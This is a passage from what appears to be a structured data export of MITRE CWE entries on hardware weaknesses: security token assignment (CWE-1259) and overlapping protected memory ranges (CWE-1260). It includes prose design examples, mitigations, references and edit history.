"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "119",
"Nature": "CanPrecede",
"Ordinal": null,
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "In a System-on-a-Chip (SoC) design the system fabric uses 16 bit addresses. An IP unit (Unit_A) has 4 kilobyte of internal memory which is mapped into a 16 kilobyte address range in the system fabric address map.\n\n| | \n|\n| System Address | Mapped to |\n| 0x0000 - 0x3FFF | Unit_A registers : 0x0000 - 0x0FFF |\n| 0x4000 - 0xFFFF | Other IPs & Memory |\n\n\t\n To protect the register controls in Unit_A unprivileged software is blocked from accessing addresses between 0x0000 - 0x0FFF. \n\n\t\n The address decoder of Unit_A masks off the higher order address bits and decodes only the lower 12 bits for computing the offset into the 4 kilobyte internal memory space.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "In this design the aliased memory address ranges are these:\n\n\n\n0x0000 - 0x0FFF\n\n\n0x1000 - 0x1FFF\n\n\n0x2000 - 0x2FFF\n\n\n0x3000 - 0x3FFF\n\n\n The same register can be accessed using four different addresses: 0x0000, 0x1000, 0x2000, 0x3000. \n\n\n The system address filter only blocks access to range 0x0000 - 0x0FFF and does not block access to the aliased addresses in 0x1000 - 0x3FFF range. Thus, untrusted software can leverage the aliased memory addresses to bypass the memory protection.",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "In this design the aliased memory addresses (0x1000 - 0x3FFF) could be blocked from all system software access since they are not used by software. \n\n\n Alternately, the MPU logic can be changed to apply the memory protection policies to the full address range mapped to Unit_A (0x0000 - 0x3FFF).",
"IntroText": null,
"Language": "Other",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1257"
]
] |
[] |
1259
|
Improper Restriction of Security Token Assignment
|
Base
|
Simple
|
Incomplete
|
The System-On-A-Chip (SoC) implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens are improperly protected.
|
Systems-On-A-Chip (Integrated circuits and hardware engines) implement Security Tokens to differentiate and identify which actions originated from which agent. These actions may be one of the directives: 'read', 'write', 'program', 'reset', 'fetch', 'compute', etc. Security Tokens are assigned to every agent in the System that is capable of generating an action or receiving an action from another agent. Multiple Security Tokens may be assigned to an agent and may be unique based on the agent's trust level or allowed privileges. Since the Security Tokens are integral for the maintenance of security in an SoC, they need to be protected properly. A common weakness afflicting Security Tokens is improperly restricting the assignment to trusted components. Consequently, an improperly protected Security Token may be able to be programmed by a malicious agent (i.e., the Security Token is mutable) to spoof the action as if it originated from a trusted agent.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": "Processor Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "System on Chip",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Files or Directories",
"Execute Unauthorized Code or Commands",
"Bypass Protection Mechanism",
"Gain Privileges or Assume Identity",
"Modify Memory",
"Modify Memory",
"DoS: Crash, Exit, or Restart"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "\n\n - Security Token assignment review checks for design inconsistency and common weaknesses.\n\n - Security-Token definition and programming flow is tested in both pre-silicon and post-silicon testing.\n\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Implementation"
],
"Strategy": null
}
] | null | null | null |
[
"121",
"681"
] | null |
[
{
"Note": "This entry is still under development and will continue to see updates and content improvements. Currently it is expressed as a general absence of a protection mechanism as opposed to a specific mistake, and the entry's name and description could be interpreted as applying to software.",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-03-06",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.1",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "corrected a typo in extended description",
"ContributionDate": "2022-10-31",
"ContributionName": "MaineK00n",
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": "Feedback",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-08-20",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Improper Protection of Security Identifiers",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "For example, consider a system with a register for storing an AES key for encryption and decryption. The key is of 128 bits implemented as a set of four 32-bit registers. The key register assets have an associated control register, AES_KEY_ACCESS_POLICY, which provides the necessary access controls. This access-policy register defines which agents may engage in a transaction, and the type of transaction, with the AES-key registers. Each bit in this 32-bit register defines a security Token. There could be a maximum of 32 security Tokens that are allowed access to the AES-key registers. The number of the bit when set (i.e., \"1\") allows respective action from an agent whose identity matches the number of the bit and, if \"0\" (i.e., Clear), disallows the respective action to that corresponding agent.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "Let's assume the system has two agents: a Main-controller and an Aux-controller. The respective Security Tokens are \"1\" and \"2\". \n| Register | Description | Default | \n| --- | --- | --- |\n| AES_ENC_DEC_KEY_0 | AES key [0:31] for encryption or decryption | 0x00000000 |\n| AES_ENC_DEC_KEY_1 | AES key [32:63] for encryption or decryption | 0x00000000 |\n| AES_ENC_DEC_KEY_2 | AES key [64:95] for encryption or decryption | 0x00000000 |\n| AES_ENC_DEC_KEY_3 | AES key [96:127] for encryption or decryption | 0x00000000 |\n| AES_KEY_ACCESS_POLICY | AES key access register [31:0] | 0x00000002 |",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "An agent with Security Token \"1\" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers. As per the above access policy, the AES-Key-access policy allows access to the AES-key registers if the security Token is \"1\".",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "The Aux-controller could program its Security Token to \"1\" from \"2\".",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The SoC does not properly protect the Security Token of the agents, and, hence, the Aux-controller in the above example can spoof the transaction (i.e., send the transaction as if it is coming from the Main-controller to access the AES-Key registers)",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "The SoC needs to protect the Security Tokens. None of the agents in the SoC should have the ability to change the Security Token.",
"IntroText": null,
"Language": "Other",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1259"
]
] |
[] |
1260
|
Improper Handling of Overlap Between Protected Memory Ranges
|
Base
|
Simple
|
Stable
|
The product allows address regions to overlap, which can result in the bypassing of intended memory protection.
|
Isolated memory regions and access control (read/write) policies are used by hardware to protect privileged software. Software components are often allowed to change or remap memory region definitions in order to enable flexible and dynamically changeable memory management by system software.
If a software component running at lower privilege can program a memory address region to overlap with other memory regions used by software running at higher privilege, privilege escalation may be available to attackers. The memory protection unit (MPU) logic can incorrectly handle such an address overlap and allow the lower-privilege software to read or write into the protected memory region, resulting in privilege escalation attack. An address overlap weakness can also be used to launch a denial of service attack on the higher-privilege software memory regions.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": null,
"Name": "Memory Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": null,
"Name": "Processor Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "Such issues could be introduced during hardware architecture and design or implementation and identified later during the Testing phase.",
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Memory",
"Read Memory",
"DoS: Instability"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability"
]
}
] |
[
{
"Description": "\n\nEnsure that memory regions are isolated as intended and that access control (read/write) policies are used by hardware to protect privileged software.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "\n\nFor all of the programmable memory protection regions, the memory protection unit (MPU) design can define a priority scheme.\n\n\nFor example: if three memory regions can be programmed (Region_0, Region_1, and Region_2), the design can enforce a priority scheme, such that, if a system address is within multiple regions, then the region with the lowest ID takes priority and the access-control policy of that region will be applied. In some MPU designs, the priority scheme can also be programmed by trusted software.\n\n\nHardware logic or trusted firmware can also check for region definitions and block programming of memory regions with overlapping addresses. \n\n\nThe memory-access-control-check filter can also be designed to apply a policy filter to all of the overlapping ranges, i.e., if an address is within Region_0 and Region_1, then access to this address is only granted if both Region_0 and Region_1 policies allow the access.\n",
"Effectiveness": "High",
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] |
[
{
"Description": "virtualization product allows compromise of hardware product by accessing certain remapping registers.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-7096",
"Reference": "CVE-2008-7096"
},
{
"Description": "processor design flaw allows ring 0 code to access more privileged rings by causing a register window to overlap a range of protected system RAM [REF-1100]",
"Link": "https://github.com/xoreaxeaxeax/sinkhole/blob/master/us-15-Domas-TheMemorySinkhole-wp.pdf",
"Reference": "[REF-1100]"
}
] | null | null |
[
"456",
"679"
] |
[
{
"Authors": [
"Christopher Domas"
],
"Edition": null,
"ExternalReferenceID": "REF-1100",
"Publication": null,
"PublicationDay": "20",
"PublicationMonth": "07",
"PublicationYear": "2015",
"Publisher": null,
"Section": null,
"Title": "The Memory Sinkhole",
"URL": "https://github.com/xoreaxeaxeax/sinkhole/blob/master/us-15-Domas-TheMemorySinkhole-wp.pdf",
"URLDate": null
},
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1338",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2019",
"Publisher": null,
"Section": null,
"Title": "Hackatdac19 ariane_soc_pkg.sv",
"URL": "https://github.com/HACK-EVENT/hackatdac19/blob/619e9fb0ef32ee1e01ad76b8732a156572c65700/tb/ariane_soc_pkg.sv#L44:L62",
"URLDate": "2023-06-21"
},
{
"Authors": [
"Florian Zaruba",
"Michael Schaffner",
"Andreas Traber"
],
"Edition": null,
"ExternalReferenceID": "REF-1339",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2019",
"Publisher": null,
"Section": null,
"Title": "csr_regfile.sv",
"URL": "https://github.com/openhwgroup/cva6/blob/7951802a0147aedb21e8f2f6dc1e1e9c4ee857a2/src/csr_regfile.sv#L45",
"URLDate": "2023-06-21"
}
] |
[
{
"Note": "As of CWE 4.6, CWE-1260 and CWE-1316 are siblings under view 1000, but CWE-1260 might be a parent of CWE-1316. More analysis is warranted.",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-02-10",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.1",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Modes_of_Introduction, Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Observed_Examples, Relationships, Weakness_Ordinalities",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Mapping_Notes, References",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "suggested content improvements",
"ContributionDate": "2021-10-20",
"ContributionName": "Narasimha Kumar V Mangipudi",
"ContributionOrganization": "Lattice Semiconductor",
"ContributionReleaseDate": null,
"ContributionType": "Feedback",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested observed examples",
"ContributionDate": "2021-10-22",
"ContributionName": "Hareesh Khattri",
"ContributionOrganization": "Intel Corporation",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Shaza Zeitouni, Mohamadreza Rostami, Pouya Mahmoody, Ahmad-Reza Sadeghi",
"ContributionOrganization": "Technical University of Darmstadt",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Rahul Kande, Chen Chen, Jeyavijayan Rajendran",
"ContributionOrganization": "Texas A&M University",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "119",
"Nature": "CanPrecede",
"Ordinal": "Primary",
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
},
{
"Description": null,
"Ordinality": "Resultant"
}
] |
[
{
"Description": "Create a high privilege memory block of any arbitrary size. Attempt to create a lower privilege memory block with an overlap of the high privilege memory block. If the creation attempt works, fix the hardware. Repeat the test.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Manual Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "For example, consider a design with a 16-bit address that has two software privilege levels: Privileged_SW and Non_privileged_SW. To isolate the system memory regions accessible by these two privilege levels, the design supports three memory regions: Region_0, Region_1, and Region_2.\n\n\nEach region is defined by two 32 bit registers: its range and its access policy.\n\n\n - Address_range[15:0]: specifies the Base address of the region\n\n - Address_range[31:16]: specifies the size of the region\n\n - Access_policy[31:0]: specifies what types of software can access a region and which actions are allowed\n\nCertain bits of the access policy are defined symbolically as follows:\n\n - Access_policy.read_np: if set to one, allows reads from Non_privileged_SW\n\n - Access_policy.write_np: if set to one, allows writes from Non_privileged_SW\n\n - Access_policy.execute_np: if set to one, allows code execution by Non_privileged_SW\n\n - Access_policy.read_p: if set to one, allows reads from Privileged_SW\n\n - Access_policy.write_p: if set to one, allows writes from Privileged_SW\n\n - Access_policy.execute_p: if set to one, allows code execution by Privileged_SW\n\nFor any requests from software, an address-protection filter checks the address range and access policies for each of the three regions, and only allows software access if all three filters allow access.\n\nConsider the following goals for access control as intended by the designer:\n\n\n - Region_0 & Region_1: registers are programmable by Privileged_SW\n\n - Region_2: registers are programmable by Non_privileged_SW\n\nThe intention is that Non_privileged_SW cannot modify memory region and policies defined by Privileged_SW in Region_0 and Region_1. Thus, it cannot read or write the memory regions that Privileged_SW is using.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "Non_privileged_SW can program the Address_range register for Region_2 so that its address overlaps with the ranges defined by Region_0 or Region_1. Using this capability, it is possible for Non_privileged_SW to block any memory region from being accessed by Privileged_SW, i.e., Region_0 and Region_1.",
"IntroText": null,
"Language": null,
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "This design could be improved in several ways.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
